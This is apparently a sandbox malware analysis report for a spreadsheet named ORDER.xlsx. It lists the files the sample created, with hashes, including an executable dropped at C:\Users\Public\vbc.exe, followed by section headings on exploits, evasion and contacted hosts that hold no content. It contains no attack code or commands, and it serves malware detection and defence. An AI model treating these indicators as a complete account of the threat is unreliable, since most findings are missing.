C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\46B80892.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B0761E7.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\844FB223.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB00B8D.png	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced	208FD40D2F72D9AED77A86A44782E9E2	216B99E777ED782BDC3BFD1075DB90DFDDABD20F	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B06673B1.png	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced	63A6CB15B2B8ECD64F1158F5C8FBDCC8	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5220394.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B706F95.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	2DC1FA3D143AF37AE6BF32BD5279807F	E05DF2F3C52920261D04185E2949F0D4AC29DE94	5A2D38ACF3A1466C315DDCB11D93687194B9771D706D797AB8007D1EE17F1AC3
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFF102BC.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3	971312D4A6C9BE9B496160215FE59C19	D8AA41C7D43DAAEA305F50ACF0B34901486438BE	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1049B6B.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3	F06432656347B7042C803FE58F4043E1	4BD52B10B24EADECA4B227969170C1D06626A639	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D04FC42A.jpeg	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3	738BDB90A9D8929A5FB2D06775F3336F	6A92C54218BFBEF83371E825D6B68D4F896C0DCE	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D09B8670.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE70FDC8.jpeg	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3	E8FC908D33C78AAAD1D06E865FC9F9B0	72CA86D260330FC32246D28349C07933E427065D	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ED60BCE4.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	1934AF66FCAFE8AE17EFC6A270BB4D70	FBA1DD045B0D867585F8BE0356944307317C889B	F494B606D36A5E5CF2BB51773659EB2AA54EC39AEE92988D5B1DE68426251DAC
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EFA4CF16.png	PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced	E2267BEF7933F02C009EAEFC464EB83D	ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE	BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F07481F.png	PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced	613C306C3CC7C3367595D71BEECD5DE4	CB5E280A2B1F4F1650040842BACC9D3DF916275E	A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4F5B.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4F5C.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso4F5D.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoFB8E.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoFB8F.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoFBBF.tmp	PC bitmap, Windows 3.x format, 20 x 20 x 24	A3C62E516777C15BF216F12143693C61	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
C:\Users\user\Desktop\~$ORDER.xlsx	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\Public\vbc.exe	PE32 executable (GUI) Intel 80386, for MS Windows	4E7BC50BF6D2B8EF86A4C4926E049AD9	F5C4808765D3157BE4E56890370BD65877C3E056	EC482DE17E558209134FCBCA7223336509A9023AC929A666A597BF91DBAC339E

Windows Analysis Report ORDER.xlsx

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs